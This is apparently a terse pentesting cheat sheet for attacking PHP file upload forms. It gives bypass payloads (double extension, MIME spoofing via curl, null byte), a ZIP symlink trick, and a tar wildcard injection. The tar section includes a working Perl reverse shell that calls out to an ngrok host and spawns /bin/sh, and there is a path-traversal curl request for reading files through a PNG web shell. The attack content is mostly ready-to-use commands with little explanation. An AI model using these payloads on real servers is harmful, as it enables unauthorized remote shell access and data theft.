File Upload

File Upload are well known and kinda old PHP vulnerabilities but can still work some times


Double Extension

# If the target is only checking extension
→ exploit.php.jpg


MIME Type

# Classical, using Burp for example
Content-Type: application/x-php → Content-Type: image/gif

# Using cURL
curl -i -F "file=@shell.php;type=image/gif" --cookie "..." "<target>"


# You can also create or update the following registry key on Windows
{{HKLM\SOFTWARE\Classes\.php}}

# Then create a “String” type registry key and, named “Content-Type" and set the value “image/gif”


Null Byte

→ exploit.php%00.jpg


ZIP Upload

# You can get resources through ZIP upload and symlinks
ln -s ../../../index.php link
zip --symlinks test.zip link


Wildcard & tar exploit

# If the server is using tar and wildcard (*) on uploaded files, you can exploit it by uploading 3 files :
• --checkpoint-action=exec=sh shell.sh
• --checkpoint=1
• shell.sh

# the shell.sh file contains a payload (different exploit are possible) :
• cat "path/index.php" > index.txt
• #!/bin/sh
perl -e 'use Socket;$i="0.tcp.ngrok.io";$p=15975;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
• tar cvf admin.tar ../../../admin


PNG IDAT Chunks

https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/

curl -X POST "http://xxx?page=../upload/ucdn6sCjDxredw1.png&0=readfile" --cookie "<cookie>" -d "1=index.php" --output res